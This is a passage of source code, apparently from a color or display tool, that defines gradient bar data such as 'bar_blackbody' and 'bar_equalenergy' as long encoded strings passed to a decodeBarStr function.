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")
bar_blackbody = decodeBarStr("+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ/QQQ/QQQ//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/QQQ/QQQ/++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//QQQ/++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//QQQ/++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA4+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA/QQQ/QQQ//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/QQQ/++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAs+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAc+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAK+LAz+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAA+LAa+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAA+LAA+MAf+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAA+LAA+MAA+NAa+OAz+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAA+LAA+MAA+NAA+OAK+QAc+RAs+SA4+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//")
bar_equalenergy = decodeBarStr("AAA/AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CDC/DDD/DDD/DDD/EEE/EEE/EFF/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/JJJ/JJJ/KJK/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RRR/SSS/TSS/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkk/kkk/lll/lll/mmm/mnm/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/utu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/222/333/333/444/444/545/555/555/666/666/667/777/777/788/888/888/999/999/999/9++/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/GGH/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RSR/SSS/TTT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/YXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkj/kkk/lll/lll/mmm/mmn/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/stt/ttt/tuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/111/222/222/333/333/444/444/554/555/555/666/666/766/777/777/777/888/888/999/999/999/9++/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BCC/CCC/CCC/DCC/DDD/DDD/DDD/EEE/EEE/FEF/FFF/FFF/GGG/GGG/GGG/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KLK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/RQQ/RRR/SRR/SSS/STT/TTT/UTU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ggg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/ooo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/utt/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/222/333/333/444/444/555/555/555/666/666/667/777/777/888/888/888/999/999/999/++9/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/FEE/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/JJJ/JJJ/JKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QRQ/RRR/RRS/SSS/TST/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XYY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcc/ccc/ddd/ddd/eee/eee/fff/gfg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/onn/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/222/333/333/444/444/455/555/555/666/666/776/777/777/887/888/888/899/999/999/999/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/CBC/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/HHG/HHH/HHH/III/III/JJJ/JJJ/KKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQR/RRR/RRR/SSS/STT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcb/ccc/ddd/ddd/eee/eee/fff/gff/ggg/hhh/hhh/iii/iii/jjj/jkk/kkk/lll/lll/mmm/mmm/nnn/noo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/322/333/333/444/444/554/555/555/666/666/766/777/777/878/888/888/999/999/999/+9+/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/GGH/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RSR/SSS/TTT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/YXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkj/kkk/lll/lll/mmm/mmn/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/stt/ttt/tuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/111/222/222/333/333/444/444/554/555/555/666/666/766/777/777/777/888/888/999/999/999/9++/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BCC/CCC/CCC/DCC/DDD/DDD/DDD/EEE/EEE/FEF/FFF/FFF/GGG/GGG/GGG/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KLK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/RQQ/RRR/SRR/SSS/STT/TTT/UTU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ggg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/ooo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/utt/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/222/333/333/444/444/555/555/555/666/666/667/777/777/888/888/888/999/999/999/++9/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/FEE/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/JJJ/JJJ/JKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QRQ/RRR/RRS/SSS/TST/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XYY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcc/ccc/ddd/ddd/eee/eee/fff/gfg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/onn/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/222/333/333/444/444/455/555/555/666/666/776/777/777/887/888/888/899/999/999/999/+++/+++/+++/////////////AAA/AAA/AAA/AAA/BBB/BBB/BBB/CBC/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/HHG/HHH/HHH/III/III/JJJ/JJJ/KKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQR/RRR/RRR/SSS/STT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcb/ccc/ddd/ddd/eee/eee/fff/gff/ggg/hhh/hhh/iii/iii/jjj/jkk/kkk/lll/lll/mmm/mmm/nnn/noo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/322/333/333/444/444/554/555/555/666/666/766/777/777/878/888/888/999/999/999/+9+/+++/+++/+++/////////////GBA+AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/GGH/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RSR/SSS/TTT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/YXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkj/kkk/lll/lll/mmm/mmn/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/stt/ttt/tuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/111/222/222/333/333/444/444/554/555/555/666/666/766/777/777/777/888/888/999/999/999/9++/+++/+++/+++/////////++/+OCA5AAA/AAA/AAA/BBB/BBB/BBB/BCC/CCC/CCC/DCC/DDD/DDD/DDD/EEE/EEE/FEF/FFF/FFF/GGG/GGG/GGG/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KLK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/RQQ/RRR/SRR/SSS/STT/TTT/UTU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ggg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/ooo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/utt/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/222/333/333/444/444/555/555/555/666/666/667/777/777/888/888/888/999/999/999/++9/+++/+++/+++/////////89/5WEAsAAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/FEE/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/JJJ/JJJ/JKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QRQ/RRR/RRS/SSS/TST/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XYY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcc/ccc/ddd/ddd/eee/eee/fff/gfg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/onn/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/222/333/333/444/444/455/555/555/666/666/776/777/777/887/888/888/899/999/999/999/+++/+++/+++/////////78/scFASKCA9AAA/AAA/BBB/BBB/BBB/CBC/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/HHG/HHH/HHH/III/III/JJJ/JJJ/KKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQR/RRR/RRR/SSS/STT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcb/ccc/ddd/ddd